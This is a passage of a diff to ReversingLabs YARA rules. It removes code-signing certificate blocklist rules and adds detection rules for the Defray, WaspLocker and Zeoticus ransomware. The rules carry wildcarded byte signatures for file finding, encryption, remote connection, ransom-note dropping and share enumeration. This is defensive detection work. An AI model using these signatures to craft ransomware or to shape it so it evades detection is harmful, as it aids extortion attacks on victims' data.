+rule REVERSINGLABS_Win32_Ransomware_Defray : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing Careto malware."
+		description = "Yara rule that detects Defray ransomware."
 		author = "ReversingLabs"
-		id = "1f1eb5c2-bfef-58df-b51e-c558d87cd5d2"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "bc9e2dfe-168b-5b99-8523-07bfdcba44f2"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L135-L151"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Defray.yara#L1-L157"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "05e466e304ed7a8f5c1c93aac4a4b7019d6fb1e07aeb45d078b657f838d1f3bd"
+		logic_hash = "82d883c77f49e50edbc7af05a108d4d54a46dca7661e4d0cd8aeffa19cb8df98"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Defray"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files = {
+            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 68 ?? ?? ?? ?? 33
+            F6 89 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B D9 56 50 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ??
+            83 C4 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 83
+            C4 ?? 2B D3 8B CB 89 95 ?? ?? ?? ?? 0F B7 01 66 89 04 0A 8D 49 ?? 66 85 C0 75 ?? 8D
+            BD ?? ?? ?? ?? 83 EF ?? 66 8B 47 ?? 83 C7 ?? 66 3B C6 75 ?? BE ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 53 A5 A5 66 A5 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF
+            15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 33 F6 8B 1D ?? ?? ?? ??
+            83 FB ?? 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ??
+            66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 8B C6
+            EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B
+            10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66
+            85 D2 75 ?? 8B C6 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B
+            95 ?? ?? ?? ?? 0F B7 01 66 89 04 0A 8D 49 ?? 66 85 C0 75 ?? 8D BD ?? ?? ?? ?? 83 EF
+            ?? 33 C9 66 8B 47 ?? 8D 7F ?? 66 3B C1 75 ?? A1 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 89 07
+            8B F2 66 8B 02 83 C2 ?? 66 3B C1 75 ?? 8D BD ?? ?? ?? ?? 2B D6 83 EF ?? 66 8B 47 ??
+            83 C7 ?? 66 3B C1 75 ?? 8B CA C1 E9 ?? F3 A5 8B CA 83 E1 ?? F6 85 ?? ?? ?? ?? ?? F3
+            A4 74 ?? 8B 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? F7 85 ?? ?? ?? ??
+            ?? ?? ?? ?? 75 ?? 8B 8D ?? ?? ?? ?? 66 8B 85 ?? ?? ?? ?? 66 89 04 59 43 89 1D ?? ??
+            ?? ?? 33 F6 8B 9D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 0F 85
+            ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$find_special_folders = {
+            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 BE ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? 56 33 DB 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 56 53 50 E8
+            ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 56 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ??
+            ?? ?? BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 6A ?? 59 68 ?? ?? ?? ?? 53 F3 A5 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 8D BD ?? ?? ?? ?? BE ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 59 F3 A5 68
+            ?? ?? ?? ?? 53 50 66 A5 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? BE ?? ?? ?? ?? 8D
+            BD ?? ?? ?? ?? 6A ?? 59 68 ?? ?? ?? ?? 53 F3 A5 50 E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ??
+            8D 85 ?? ?? ?? ?? 83 C4 ?? 53 6A ?? 50 53 FF D6 53 6A ?? 8D 85 ?? ?? ?? ?? 50 53 FF
+            D6 53 6A ?? 8D 85 ?? ?? ?? ?? 50 53 FF D6 8D BD ?? ?? ?? ?? 83 EF ?? 66 8B 47 ?? 83
+            C7 ?? 66 3B C3 75 ?? 6A ?? 59 BE ?? ?? ?? ?? F3 A5 8D BD ?? ?? ?? ?? 83 EF ?? 66 8B
+            47 ?? 83 C7 ?? 66 3B C3 75 ?? 6A ?? 59 BE ?? ?? ?? ?? F3 A5 8D BD ?? ?? ?? ?? 83 EF
+            ?? 66 8B 47 ?? 83 C7 ?? 66 3B C3 75 ?? BE ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? A5 A5 A5 A5
+            66 A5 E8 ?? ?? ?? ?? 84 C0 74 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ?? 8D 8D
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ?? 8D
+            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ??
+            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
+            4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$remote_connection = {
+            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ?? 53 56 57 89 85 ??
+            ?? ?? ?? 33 DB 8B 45 ?? 8B FA 68 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53
+            50 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? A0 ?? ?? ?? ?? 88 45 ?? 8D 85 ??
+            ?? ?? ?? 53 53 53 53 50 FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8B D8 89 9D ?? ?? ?? ??
+            85 DB 74 ?? 33 C0 50 50 6A ?? 50 50 68 ?? ?? ?? ?? 57 53 FF 15 ?? ?? ?? ?? 8B F8 85
+            FF 74 ?? 33 C0 50 68 ?? ?? ?? ?? 50 50 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 45 ?? 50
+            57 FF 15 ?? ?? ?? ?? 8B D8 85 DB 74 ?? 8B 95 ?? ?? ?? ?? 33 C9 85 D2 74 ?? 8B CA 8D
+            41 ?? 89 85 ?? ?? ?? ?? 8A 01 41 84 C0 75 ?? 2B 8D ?? ?? ?? ?? 51 52 6A ?? 6A ?? 53
+            FF 15 ?? ?? ?? ?? 53 FF D6 8B 9D ?? ?? ?? ?? 57 FF D6 53 FF D6 8B 4D ?? 5F 5E 33 CD
+            5B E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$encrypt_files_1 = {
+            55 8B EC 51 51 83 4D ?? ?? 83 4D ?? ?? 57 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68
+            ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 75 ?? 6A ?? 58 EB ?? 56 8D 45 ?? 50
+            57 FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 75 ?? 6A ?? EB ?? 8B 75 ?? 3B C6 0F 42 F0 83 7D
+            ?? ?? 74 ?? 6A ?? 8D 45 ?? 50 56 FF 75 ?? 57 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 6A ?? 5E
+            57 FF 15 ?? ?? ?? ?? EB ?? 57 FF 15 ?? ?? ?? ?? 3B 75 ?? 6A ?? 58 0F 45 F0 8B C6 EB
+            ?? 57 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? 5E 5F 8B E5 5D C2
+        }
+		$encrypt_files_2_p1 = {
+            68 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 33 C0 89 85 ?? ?? ??
+            ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 45 ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ??
+            89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ??
+            ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? C6 45 ?? ?? 50 89 85 ?? ??
+            ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 6A ?? 59 33 C0 8D 7D ??
+            F3 AB 83 C4 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 85 C0 74 ?? FF 15 ?? ?? ?? ?? 50
+            68 ?? ?? ?? ?? 83 CE ?? EB ?? 6A ?? 8D 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 85
+            C0 74 ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 5E 6A ?? 8B D6 59 E8 ?? ?? ?? ??
+            59 59 E9 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 85 F6 75 ?? 6A ?? 5E E9 ?? ?? ?? ?? 80 BD ??
+            ?? ?? ?? ?? B8 ?? ?? ?? ?? 75 ?? B8 ?? ?? ?? ?? 3B F0 0F 47 F0 8D 85 ?? ?? ?? ?? 50
+            56 8B C8 89 B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 FF B5 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ??
+            ?? 8B F8 85 FF 79 ?? FF 15 ?? ?? ?? ?? 50 8D 45 ?? 50 6A ?? 5A 6A ?? 59 E8 ?? ?? ??
+            ?? 59 59 BE ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ??
+            FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 5A 6A ?? 59 E8 ?? ?? ?? ?? 59 59 6A ?? E9
+            ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 59 8D 55 ?? 8D 8D
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C7 8B DF 25 ?? ?? ?? ?? 79 ?? 48 83 C8 ?? 40 74 ?? 8B
+        }
+		$encrypt_files_2_p2 = {
+            B5 ?? ?? ?? ?? 43 46 8B C3 25 ?? ?? ?? ?? 79 ?? 48 83 C8 ?? 40 75 ?? 89 B5 ?? ?? ??
+            ?? 8D 85 ?? ?? ?? ?? 50 53 8B C8 E8 ?? ?? ?? ?? 33 D2 85 FF 7E ?? 8B 85 ?? ?? ?? ??
+            8A 0C 10 8B 85 ?? ?? ?? ?? 88 0C 10 42 3B D7 7C ?? 3B FB 7D ?? 8B C3 2B C7 50 8B 85
+            ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 03 C7 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50
+            53 8B C8 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? 8B
+            95 ?? ?? ?? ?? 8D 45 ?? 51 50 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74
+            ?? 6A ?? E9 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 53 FF B5 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 59 59 85 C0 75 ?? 6A ?? 33 FF 5A 8B 85 ?? ?? ?? ?? 8A 4C 3D ?? 88 0C 38
+            47 3B FA 7C ?? 8D 75 ?? 6A ?? 2B F2 5F 8B 85 ?? ?? ?? ?? 8A 0C 32 88 0C 10 42 3B D7
+            7C ?? 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 59 59 85 C0 74 ?? 6A ?? E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 83 EC ?? 8D
+            85 ?? ?? ?? ?? 50 51 8B 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
+        }
+		$encrypt_files_2_p3 = {
+            85 C0 79 ?? 6A ?? E9 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? BA ?? ?? ?? ?? 2B F7 8B 85 ?? ??
+            ?? ?? 8A 0C 37 88 0C 38 47 3B FA 7C ?? 8B B5 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8A 8C 02 ??
+            ?? ?? ?? 8B 85 ?? ?? ?? ?? 88 0C 10 42 81 FA ?? ?? ?? ?? 7C ?? 83 BD ?? ?? ?? ?? ??
+            74 ?? 8D 4D ?? E8 ?? ?? ?? ?? 84 C0 75 ?? BE ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8B C6 E9 ?? ?? ?? ?? 51 6A ?? 53 FF B5 ?? ?? ?? ?? 8D 4D ?? E8
+            ?? ?? ?? ?? 8B F8 85 FF 79 ?? FF 15 ?? ?? ?? ?? 50 8D 45 ?? 50 6A ?? 5A 6A ?? 59 E8
+            ?? ?? ?? ?? 59 59 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 87 ?? ?? ?? ??
+            E9 ?? ?? ?? ?? 51 6A ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B
+            F8 85 FF 79 ?? FF 15 ?? ?? ?? ?? 50 8D 45 ?? 50 6A ?? 5A 6A ?? 59 E8 ?? ?? ?? ?? 59
+            59 EB ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 01 34 85
+            ?? ?? ?? ?? FF 04 85 ?? ?? ?? ?? 33 FF 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8B C7 E8 ?? ?? ?? ?? C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TecSystem Ltd." and pe.signatures [ i ] . serial == "0e:80:8f:23:15:15:bc:51:9e:ea:1a:73:cd:f3:26:6f" and 1468799999 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $find_special_folders ) and ( $encrypt_files_1 ) and ( all of ( $encrypt_files_2_p* ) ) and ( $remote_connection )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_36Be4Ad457F062Fa77D87595B8Ccc8Cf : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Wasplocker : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing Careto malware."
+		description = "Yara rule that detects WaspLocker ransomware."
 		author = "ReversingLabs"
-		id = "224ec8ed-e4f0-5d1b-8cdd-a669a7e3e859"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "596bf965-700a-58f5-b0e5-61ec57c23a3e"
+		date = "2022-06-28"
+		modified = "2022-06-28"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L153-L169"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.WaspLocker.yara#L1-L76"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "d19a6f22a1e702a4da69c867195722adf8f1dd84539f2c584af428fe4b1caf79"
+		logic_hash = "852ec52328fca36d651e3176ac33a57ce26cefecadc2aad27235548e5b9813c1"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "WaspLocker"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files = {
+            50 50 8D 8D ?? ?? ?? ?? 51 8D 8D ?? ?? ?? ?? 51 50 50 50 56 FF 15 ?? ?? ?? ?? 85 C0
+            75 ?? 57 53 E8 ?? ?? ?? ?? 8D 4E ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
+            A8 ?? 75 ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? A8 ?? 0F 85 ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 50 FF 15
+            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 85 C0 74 ?? 3B 85 ?? ?? ?? ?? 76 ?? 8D 85 ?? ?? ?? ??
+            50 E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 2B 95 ?? ?? ?? ?? 59 03 C2 B9 ?? ?? ?? ?? 3B C1
+            7D ?? 8D 85 ?? ?? ?? ?? 2B CA 50 51 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0
+            74 ?? 83 F8 ?? 74 ?? 83 F8 ?? 74 ?? 83 F8 ?? 74 ?? 83 F8 ?? 75 ?? EB ?? 85 DB 0F 84
+            ?? ?? ?? ?? C7 43 ?? ?? ?? ?? ?? 85 FF 75 ?? 33 C0 EB ?? 57 E8 ?? ?? ?? ?? 59 50 57
+            8D 4B ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 4E ?? E8 ?? ?? ?? ?? 33 C0 40 E8 ?? ?? ??
+            ?? C2 ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? CC 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33
+            F6 89 75 ?? 33 FF 89 7D ?? 21 75 ?? 21 75 ?? 39 3D ?? ?? ?? ?? 75 ?? 8D 45 ?? 50 E8
+            ?? ?? ?? ?? 8B F8 89 7D ?? 85 FF 74 ?? FF 75 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8B F0 89 75 ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? C2
+        }
+		$drop_aux_files = {
+            A1 ?? ?? ?? ?? 89 01 A1 ?? ?? ?? ?? 68 ?? ?? ?? ?? 89 41 ?? 66 A1 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 6A ?? 66 89 41 ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 56 6A ?? FF 15 ?? ??
+            ?? ?? 89 85 ?? ?? ?? ?? 85 C0 74 ?? 56 6A ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 50 FF 15
+            ?? ?? ?? ?? 8B F8 85 FF 74 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B
+            F0 83 C4 ?? 85 F6 74 ?? 56 FF B5 ?? ?? ?? ?? 6A ?? 57 E8 ?? ?? ?? ?? 6A ?? 6A ?? 56
+            E8 ?? ?? ?? ?? 83 C4 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 FF 15
+            ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 81 C6 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68
+            ?? ?? ?? ?? BA ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 68 ?? ??
+            ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ??
+            ?? ?? 56 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F0 6A ?? 56 FF 15 ?? ??
+            ?? ?? 50 89 85 ?? ?? ?? ?? E8
+        }
+		$drop_ransom_notes = {
+            89 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 84 C0
+            75 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? E8
+            ?? ?? ?? ?? 8B C8 85 C9 0F 84 ?? ?? ?? ?? 8B 01 8B 40 ?? FF D0 83 C0 ?? 89 85 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 84 C0 75 ?? 68 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
+            8B C8 85 C9 0F 84 ?? ?? ?? ?? 8B 01 8B 40 ?? FF D0 83 C0 ?? 89 85 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 84 C0 75 ?? B9 ?? ?? ?? ?? 8D
+            51 ?? 90 8A 01 41 84 C0 75 ?? 2B CA 51 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
+            ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8B C8 85 C9 0F 84 ?? ?? ?? ?? 8B 01 8B 40 ?? FF D0 83
+            C0 ?? 89 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
+            84 C0 75
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TecSystem Ltd." and pe.signatures [ i ] . serial == "36:be:4a:d4:57:f0:62:fa:77:d8:75:95:b8:cc:c8:cf" and 1372377599 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $drop_aux_files ) and ( $drop_ransom_notes )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_75A38507Bf403B152125B8F5Ce1B97Ad : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Zeoticus : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing Zeus malware."
+		description = "Yara rule that detects Zeoticus ransomware."
 		author = "ReversingLabs"
-		id = "6805abd8-217e-5179-ab5a-297e2a17e65e"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "483b20a4-2c16-5509-a503-2462a53d4d31"
+		date = "2021-03-19"
+		modified = "2021-03-19"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L171-L187"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Zeoticus.yara#L1-L90"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "af21cee3ee92268c3aa0106a245e5a00c5ba892fca3e4fd2dc55e302ed5d470a"
+		logic_hash = "adf42b96139ad98f4253f3eba2c4af1be9545825605e0851185cc15284d9e9a0"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Zeoticus"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$enum_shares_p1 = {
+            53 55 8B 2D ?? ?? ?? ?? 8B C1 56 57 8B 3D ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ??
+            ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 4C 24 ?? 51 8D 4C 24 ?? 51
+            8D 4C 24 ?? 51 6A ?? 8D 4C 24 ?? 51 6A ?? 50 FF 15 ?? ?? ?? ?? 89 44 24 ?? 85 C0 74
+            ?? 3D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 83 7C 24 ?? ?? 8B 5C 24 ?? 89 5C 24 ?? C7 44 24
+            ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 33 F6 39 73 ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF
+            33 FF D5 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 33 FF D5 85 C0 0F 84 ?? ?? ?? ??
+            68 ?? ?? ?? ?? FF 33 FF D5 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 33 FF D5 85 C0
+            0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 33 FF D5 85 C0 0F 84 ?? ?? ?? ?? FF 33 8D 44 24
+            ?? FF 74 24 ?? 68 ?? ?? ?? ?? 50 FF D7 A1 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 68 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 83 C4 ?? 89 04 8D ?? ?? ?? ?? 8D 4C 24 ?? 51
+        }
+		$enum_shares_p2 = {
+            50 FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8D 04 85 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 56 FF 34
+            85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 56 FF 15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 04 8D ??
